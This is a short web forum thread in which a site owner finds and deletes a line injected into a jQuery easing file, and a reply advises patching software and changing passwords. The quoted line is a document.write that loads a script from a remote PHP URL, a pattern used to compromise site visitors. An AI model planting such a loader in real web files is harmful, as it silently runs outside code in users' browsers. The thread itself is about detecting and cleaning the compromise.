JQuery script file

[telcelsms94]

Recently I see in my site a warning from my AVG Antivirus, and the reason is *.js files extension that I load in my page to display an animation in a menu or something with animation images.
In CPanel file browser I see this file jquery.easing.js, and in the "last modified" column, it shows a recently modification, so I saw with the code editor button and I saw a normal code but at bottom I saw a line code like this:


/*087710*/
/*bfxbfx09045bfx09*/

document.write("<script type='text/javascript' src='htp://taconline.net/xkBQtRT7.php?id=203276389'></"+ "script>");

/*/087710*/

I Deleted this code and my antivirus online shield doesn't display a warning. But this is normal?, I mean I never wrote (copy or paste) this code in JS files.

 

[essellar]

No, it's not normal. Someone has been playing in your sandbox. Update whatever software you are using to the latest patched versions (that may have been what was exploited), and change your passwords.

Also, it is ALWAYS best to serve jQuery from Google Hosted Libraries rather than from your own server (unless you're developing an intranet app). Not only does that ensure the safety and availability of the file(s), it will very likely save your users a big download (the chances of the file already being cached are very high).

 

[telcelsms94]

For now I will change passwords and check all archives to detect suspicious code.